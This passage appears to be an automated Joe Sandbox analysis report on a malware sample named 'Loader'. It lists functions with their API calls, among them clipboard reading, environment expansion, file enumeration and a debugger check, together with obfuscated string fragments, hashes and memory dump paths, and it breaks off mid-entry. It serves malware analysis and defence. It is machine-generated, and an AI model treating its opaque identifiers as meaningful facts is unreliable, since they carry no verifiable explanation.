Instruction Fuzzy Hash: 79F092B45093428FE324DF29C5A8B5EBBF0BB88304F00891CE4998B290C7B595098F82

Function 0040CD30 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CD43

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 89b421da4be621a6f53322ceb903cb81620c8d2bdd6469584064898a13de0a30
Instruction ID: 623e5ea4ddc3d9043fec7026d24f58760a742289b41f13a79f83a96a0a9a4a35
Opcode Fuzzy Hash: 89b421da4be621a6f53322ceb903cb81620c8d2bdd6469584064898a13de0a30
Instruction Fuzzy Hash: 45D0A7346501447BD214671DED47F56365C9387759F440235B362CB2D6DD506810C579

Function 0043AC32 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0043AC4D

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8846ced3079f5c18de75f6d9ce761765aa9f5eca5e511fa2a96ff5aa44dc1cd4
Instruction ID: 012f71a3a032f5abcc96f8c740cddb013d2357ba26b15dcfa30ad5ae7aab7874
Opcode Fuzzy Hash: 8846ced3079f5c18de75f6d9ce761765aa9f5eca5e511fa2a96ff5aa44dc1cd4
Instruction Fuzzy Hash: 5BC08031404522FBC6503F157C057DE3610EF05311F070861F00058075D725CC61C5D8

Function 0043AC00 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,7E794FF3,?,00408859,7E794FF3), ref: 0043AC10

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9cef1cbe651b0ed60b34efb379772da6adee9ab1ab503a86b321aabc44a7781a
Instruction ID: 1862c9cd68e344d40816c81f1b6b688736f6379114b4badfac60c21a762842ed
Opcode Fuzzy Hash: 9cef1cbe651b0ed60b34efb379772da6adee9ab1ab503a86b321aabc44a7781a
Instruction Fuzzy Hash: D5C09B31445221ABC6503B15FC05FCA3F58DF49361F150455F00467072C761AC91C6D8

Non-executed Functions

Function 00415F2D Relevance: 30.8, APIs: 4, Strings: 13, Instructions: 1072COMMON

Download Yara Rule

Strings

Kv, xrefs: 00416543
P)46, xrefs: 0041658D, 004160A0
A, xrefs: 0041655B
F, xrefs: 00415F50
7@6F, xrefs: 00416AED
!>K, xrefs: 00416A1C
P)46, xrefs: 00415F65
BC@, xrefs: 00416C50
F}^6, xrefs: 0041602B
q*P, xrefs: 00415FF9
&>K, xrefs: 00416A3F
cA, xrefs: 004163D4
g, xrefs: 00416A17

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: !>K$&>K$7@6F$A$F$F}^6$Kv$P)46$P)46$g$q*P$BC@$cA
API String ID: 0-1404199487
Opcode ID: bc2e1ec545659b611d5e768b705fef94ce5ecebba7b34cf5504dce908e6b6d7f
Instruction ID: 9b2308db071d4e055e69daabddb361a0688e1a71d139ce48a86b06fcd2de6d53
Opcode Fuzzy Hash: bc2e1ec545659b611d5e768b705fef94ce5ecebba7b34cf5504dce908e6b6d7f
Instruction Fuzzy Hash: 487247726083518BC724CF28C8917ABB7E1EFD5314F1A896DE8C99B3A1D738D841CB56

Function 00423488 Relevance: 29.8, Strings: 23, Instructions: 1080COMMON

Download Yara Rule

Strings

s u&, xrefs: 00423D25
0D2J, xrefs: 0042440D
~(n., xrefs: 00423D0F
;:98, xrefs: 00424735
;:98, xrefs: 00424685
Q_, xrefs: 004237A6
o, xrefs: 00423CCD
5|6r, xrefs: 00423D9E
0H:N, xrefs: 00424415
_Y, xrefs: 004236E3
_0x6, xrefs: 00423CF9
rs, xrefs: 0042393D
k>[<, xrefs: 0042362C
3=, xrefs: 0042372D
;E, xrefs: 004237BC
9L)R, xrefs: 0042441D
SP, xrefs: 00424425
`4~*, xrefs: 00423D04
U,W", xrefs: 00423D1A
v$rZ, xrefs: 00423D30
67, xrefs: 00423FD3
, xrefs: 0042425B, 004242BF, 004242CF
:x3~, xrefs: 00423D93

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: 0D2J$0H:N$5|6r$67$9L)R$:x3~$;:98$;:98$;E$Q_$SP$U,W"$_0x6$`4~*$k>[<$o$rs$s u&$v$rZ$~(n.$3=$_Y$
API String ID: 0-471170200
Opcode ID: 49785c331e303325c2d5f1130fe28a7cdd9916a9b95d97a78b9ec09e7f27b649
Instruction ID: ff6f4c789d5a6e4588788ded0b6cc1fb0d5ad504678d0f77139615620280fa2d
Opcode Fuzzy Hash: 49785c331e303325c2d5f1130fe28a7cdd9916a9b95d97a78b9ec09e7f27b649
Instruction Fuzzy Hash: F4A292B560C3918BC334CF64D8417AFBBF2EBD2304F44892DD4999B261D77999068B8B

Function 00431B60 Relevance: 9.1, APIs: 6, Instructions: 126clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00431B82
GetClipboardData.USER32 ref: 00431BA3
CloseClipboard.USER32 ref: 00431CDF

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: 1edbc63d022be973e181bcc4bcc2c77a4c0be4f208b51d4151ab8a42b88737a9
Instruction ID: 8359400020177de919e97fd6decbb339d076148ace7eba0a29addb768ac27250
Opcode Fuzzy Hash: 1edbc63d022be973e181bcc4bcc2c77a4c0be4f208b51d4151ab8a42b88737a9
Instruction Fuzzy Hash: A641F1B08087828FD701AF78D5493AEBFA0AB06304F04863ED49597791D3799959C7A7

Function 00CDB1B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00CDAB6D,00000002,00000000,?,?,?,00CDAB6D,?,00000000), ref: 00CDB250
GetLocaleInfoW.KERNEL32(?,20001004,00CDAB6D,00000002,00000000,?,?,?,00CDAB6D,?,00000000), ref: 00CDB279
GetACP.KERNEL32(?,?,00CDAB6D,?,00000000), ref: 00CDB28E

Strings

OCP, xrefs: 00CDB20B
ACP, xrefs: 00CDB1D5

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: dd29c6e02400997879cbc736c3e00cdfd5391a457f83710846e7202b044d1160
Instruction ID: 7b4f75154e5650e4de5f2aa340222c764dfda8cd670a65059e55a72b52addca5
Opcode Fuzzy Hash: dd29c6e02400997879cbc736c3e00cdfd5391a457f83710846e7202b044d1160
Instruction Fuzzy Hash: 4E21AF63A00101EADB348F69C941B9F73A6AF54F60B57842AEA2ADB314E732DF40C350

Function 0041FD70 Relevance: 8.0, Strings: 6, Instructions: 504COMMON

Download Yara Rule

Strings

=V+T, xrefs: 0041FEF4
0nl, xrefs: 0041FF04
(R)P, xrefs: 0041FEFC
(w/q, xrefs: 0041FE47
&Z&X, xrefs: 0041FEEC
s%}, xrefs: 0041FE4F

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: s%}$&Z&X$(R)P$(w/q$0nl$=V+T
API String ID: 0-1387839616
Opcode ID: c747c06ce6a634ceac96083f3f5c235a32ad4c6b75348b3fa91c2a960a1c18ce
Instruction ID: 7cc081393892e2bb81599d43f4e62f865ac533fb992447ade34df63e85d6afdd
Opcode Fuzzy Hash: c747c06ce6a634ceac96083f3f5c235a32ad4c6b75348b3fa91c2a960a1c18ce
Instruction Fuzzy Hash: C0D116B26043108BD724CF25D8527ABB7F2FFD1314F18896DE4958B3A1E7798845C786

Function 00409770 Relevance: 7.9, Strings: 6, Instructions: 372COMMON

Download Yara Rule

Strings

503360CAB129FD4CDB71E32F12885CB3, xrefs: 0040980C
IIMC, xrefs: 00409ABC
X+\?, xrefs: 00409AAB
IIMC, xrefs: 004098E5, 00409866, 004097F5, 00409806, 00409895
~u, xrefs: 004099E6
sm, xrefs: 004099F6

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: 503360CAB129FD4CDB71E32F12885CB3$IIMC$IIMC$X+\?$sm$~u
API String ID: 0-4040820192
Opcode ID: 98299133eb32eaaa475b98df3f74112f0f3d5447a2ca98cf74f5130eeb0459c5
Instruction ID: 2f09004ba503a68494627b5ecf3dbf59a07ec3df9fe6c065a8492fe87d6ce8be
Opcode Fuzzy Hash: 98299133eb32eaaa475b98df3f74112f0f3d5447a2ca98cf74f5130eeb0459c5
Instruction Fuzzy Hash: B5B1F2706083808BD718DF3588916AFBBE1EFD2314F144A6DF5E19B392D778890ACB56

Function 00CDAA37 Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00CDAB3F
IsValidCodePage.KERNEL32(00000000), ref: 00CDAB7D
IsValidLocale.KERNEL32(?,00000001), ref: 00CDAB90
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CDABD8
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CDABF3

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: fda1c56f1a7f0c9a63ced4dbe06ff53259948b65b3476b7f42a18d2d6ce3b337
Instruction ID: 0bc2ae38e98a575a0ddf227704418bfcae0cfc189d0bc7a660b65386a9369dc8
Opcode Fuzzy Hash: fda1c56f1a7f0c9a63ced4dbe06ff53259948b65b3476b7f42a18d2d6ce3b337
Instruction Fuzzy Hash: D3518271A00205AFDF20DFA5CC85BBE73B9EF44710F04456BEA14EB291E7719A41DB62

Function 00426F6C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 220COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?), ref: 00426F9B

Strings

AuB, xrefs: 00426FB5
KJIH, xrefs: 004270FE
@mB, xrefs: 00427018, 0042713C, 0042728C

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: @mB$AuB$KJIH
API String ID: 237503144-3501611786
Opcode ID: ab3f4315a23d5c9ae3ee0830ec8f5c28eb5824a3093ec2abad75e7fe3ec17df4
Instruction ID: d262133a3be5540d0118b197f08afeb0b7c8be6a9deb4b7d3c14bb8b7fef4ca8
Opcode Fuzzy Hash: ab3f4315a23d5c9ae3ee0830ec8f5c28eb5824a3093ec2abad75e7fe3ec17df4
Instruction Fuzzy Hash: 3571EEB5A08310DFD3148F25E84171BB7E1EBCA314F05896EF985A73A1D738E801CB9A

Function 00417B87 Relevance: 6.9, Strings: 5, Instructions: 628COMMON

Download Yara Rule

Strings

;:98, xrefs: 004180A5
6, xrefs: 00417F21
;:98, xrefs: 00417D95
;:98, xrefs: 00417BA5
;:98, xrefs: 00417E95

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: 6$;:98$;:98$;:98$;:98
API String ID: 2994545307-3965596542
Opcode ID: 24de79856df6bd49acb4c994e07c03ab278b176e28e66f8f556a4f0e8c0f423f
Instruction ID: 9ea0004e4662c6dacb3168d02cb1b15c360314975831602f1397047ae4578862
Opcode Fuzzy Hash: 24de79856df6bd49acb4c994e07c03ab278b176e28e66f8f556a4f0e8c0f423f
Instruction Fuzzy Hash: 57F14C7560C3408BD7248F24D8926BBB7E2EB87314F255A2DD48263352D739DC878B9E

Function 0042B94C Relevance: 6.5, Strings: 5, Instructions: 288COMMON

Download Yara Rule

Strings

{IKu, xrefs: 0042BB48
[Z, xrefs: 0042B9B3
[Z, xrefs: 0042BB63
mZ, xrefs: 0042BBEB
mZ, xrefs: 0042BA39

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: [Z$[Z$mZ$mZ${IKu
API String ID: 0-1401884219
Opcode ID: 606c2bcfcb5eae1da5b2f0c97e8f05bca2f2f94ae4942d599497e84f1e03380b
Instruction ID: 8bd9f270d81d9291231bb75fbec219a0c78526c0c8645d91fa1bb5ce8a86b988
Opcode Fuzzy Hash: 606c2bcfcb5eae1da5b2f0c97e8f05bca2f2f94ae4942d599497e84f1e03380b
Instruction Fuzzy Hash: 5E811661704F418BD729CE2AC491377BBE29F9A301B5889AEC0D787B56DB3CE8068754

Function 004159D8 Relevance: 6.4, Strings: 5, Instructions: 125COMMON

Download Yara Rule

Strings

OGO@, xrefs: 00415B41
;:98, xrefs: 00415AA5
wOGH, xrefs: 00415B2B
pvxO, xrefs: 00415B4C
t_, xrefs: 00415B57

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: ;:98$OGO@$pvxO$t_$wOGH
API String ID: 0-2832874370
Opcode ID: 32d37d2d8af7b6dc103b6a5232507635f2f3c4c0de0d09c58c499025a54c7502
Instruction ID: c170b910105fcf85f83f3db7783d2ab6abd74a21b28db397255ddb642b7adcbd
Opcode Fuzzy Hash: 32d37d2d8af7b6dc103b6a5232507635f2f3c4c0de0d09c58c499025a54c7502
Instruction Fuzzy Hash: E04126B4409780DBE7309F24D846BEF77E0AF82304F154A3DE48997262DB395856CB6B

Function 00CDB799 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CDB889

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: c1721d987ce24d03f7da6d62f5066f662c7864b5e8877bbe9a15a11670121128
Instruction ID: 6940fa6ab960147cafb6a810149827cc87c7d371fbf121564f9f8a38725a8ea8
Opcode Fuzzy Hash: c1721d987ce24d03f7da6d62f5066f662c7864b5e8877bbe9a15a11670121128
Instruction Fuzzy Hash: EE71C071D051699FDF20AF288C99ABEB7B8AF05300F1541DBE61DA7351EB318E85AF10

Function 00CC9A73 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00CC9A7F
IsDebuggerPresent.KERNEL32 ref: 00CC9B4B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CC9B64
UnhandledExceptionFilter.KERNEL32(?), ref: 00CC9B6E

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: c9e219896418913f1c6436ec006c521fcbf7f52045f68ee682412900a6ae19dd
Instruction ID: 8a73a1ef376d030a2178dddb642ca8749a23eadf193294cf21278936531b1939
Opcode Fuzzy Hash: c9e219896418913f1c6436ec006c521fcbf7f52045f68ee682412900a6ae19dd
Instruction Fuzzy Hash: 4131D775D05219DBDB21DFA4D989BCDBBF8AF08300F1041EAE40CAB250EB719B859F45

Function 00CC96B3 Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00CC96B0,00CE6C8C), ref: 00CC96B8
UnhandledExceptionFilter.KERNEL32(00CC96B0,?,00CC96B0,00CE6C8C), ref: 00CC96C1
GetCurrentProcess.KERNEL32(C0000409,?,00CC96B0,00CE6C8C), ref: 00CC96CC
TerminateProcess.KERNEL32(00000000,?,00CC96B0,00CE6C8C), ref: 00CC96D3

Memory Dump Source

Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 9724667a8b1ebd4b36daae28e541807cae41d33aba8b1eef62f58cdc03255e92
Instruction ID: 210dc43554427c696cddb980a2614deb62bf2fe2e5041468c74bdb4ff40bfbc8
Opcode Fuzzy Hash: 9724667a8b1ebd4b36daae28e541807cae41d33aba8b1eef62f58cdc03255e92
Instruction Fuzzy Hash: F5D01232001288ABDB802BE0EC8CB8D3FA8FB08392F044400F70A8A062CB3544008B66

Function 004284F0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 004285EC
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 00428677

Strings

h, xrefs: 00428837

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: h
API String ID: 237503144-2439710439
Opcode ID: 917631255cea874d52ee2451cd31ec8c6a983d8220657606dbb23d5300a23d1a
Instruction ID: 6da96b05192abfa36c2a8587af07314eead40ac1a1aac6b03a878773a9e830e3
Opcode Fuzzy Hash: 917631255cea874d52ee2451cd31ec8c6a983d8220657606dbb23d5300a23d1a
Instruction Fuzzy Hash: E0B152B4608350DFE3109F25E84072FBBE5FB8A304F45896DF5C897291DB79890ACB4A

Function 0042821B Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 211COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 00428240

Strings

yFP, xrefs: 00428337
pv, xrefs: 00428305

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: yFP$pv
API String ID: 237503144-1043563703
Opcode ID: f10766b3e79ff34c811775228f90b1f749822b533f99bee141e4a8521bc8357b
Instruction ID: 026c7c20c7aa87b3c201e73a36abf931272afcd6fe876e8aa0be72b8c63f741b
Opcode Fuzzy Hash: f10766b3e79ff34c811775228f90b1f749822b533f99bee141e4a8521bc8357b
Instruction Fuzzy Hash: 1561AEB2E042298FDB24CF68DC917DEB7B1FB45304F1081A9D459EB381DB749A868F91

Function 004275D8 Relevance: 5.3, Strings: 4, Instructions: 286COMMON

Download Yara Rule

Strings

uxB, xrefs: 0042786F
T)(8, xrefs: 00427727
KJIH, xrefs: 004278CD
:)(8, xrefs: 004276A8

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: :)(8$KJIH$T)(8$uxB
API String ID: 0-1987596445
Opcode ID: 3345145acc49b9c3dbac7cb31740d04c8c160c59f9f4c2bc1283cb842ee06d6c
Instruction ID: ccc3da5218a74a692c786e2037a5d08811c05f9e94c8575ce9ebbbf82118eadb
Opcode Fuzzy Hash: 3345145acc49b9c3dbac7cb31740d04c8c160c59f9f4c2bc1283cb842ee06d6c
Instruction Fuzzy Hash: 1F8134B5E00329CFDB108FA8DC817AAB7B1FF4A314F154169E985AB351E7396C11CB88

Function 00414D12 Relevance: 4.4, Strings: 3, Instructions: 671COMMON

Download Yara Rule

Strings

D]+\, xrefs: 00415090
;:98, xrefs: 004153B0
BSA, xrefs: 00415336

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: ;:98$BSA$D]+\
API String ID: 0-196827673
Opcode ID: c7982d4f4271d16111dd4f2137e28447e8435baee3f58ac8e6d71932b6150687
Instruction ID: 28ac4e1643055a154b02c81a005dabff3eadb9e6cd05567daceab985af77b9f4
Opcode Fuzzy Hash: c7982d4f4271d16111dd4f2137e28447e8435baee3f58ac8e6d71932b6150687
Instruction Fuzzy Hash: D6123678608300DFEB049F24E842BAFB7E1EBCA314F15593DF581972A2D7359C458B8A

Function 0043DD50 Relevance: 3.2, Strings: 2, Instructions: 711COMMON

Download Yara Rule

Strings

.>, xrefs: 0043DEEE
RC, xrefs: 0043E646

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: .>$RC
API String ID: 0-739570707
Opcode ID: 88843e9d9ca97e761628b6e7b81a6613e55d2fef027e54e64495080aa6d0c652
Instruction ID: 3b0b953b2d33e2e96e4eab31f83276a2f906f400271f46ba91b71cc12d4bd901
Opcode Fuzzy Hash: 88843e9d9ca97e761628b6e7b81a6613e55d2fef027e54e64495080aa6d0c652
Instruction Fuzzy Hash: CE22033AA08261CFD704CF68E89066BB7E2FBCE311F0A89BDD98987355D6349C41DB45

Function 0042820E Relevance: 3.2, APIs: 2, Instructions: 169COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 004280E7
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?,7D3C441D), ref: 004281D5

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 1a636787e15b6dfbffc777b98caeaa58adb1bad3d2e6ff711b04f599927b9df5
Instruction ID: 140769ea01505089deb0bb54f1d738c6ab876715078b8d5b7427788b4e0e7cb1
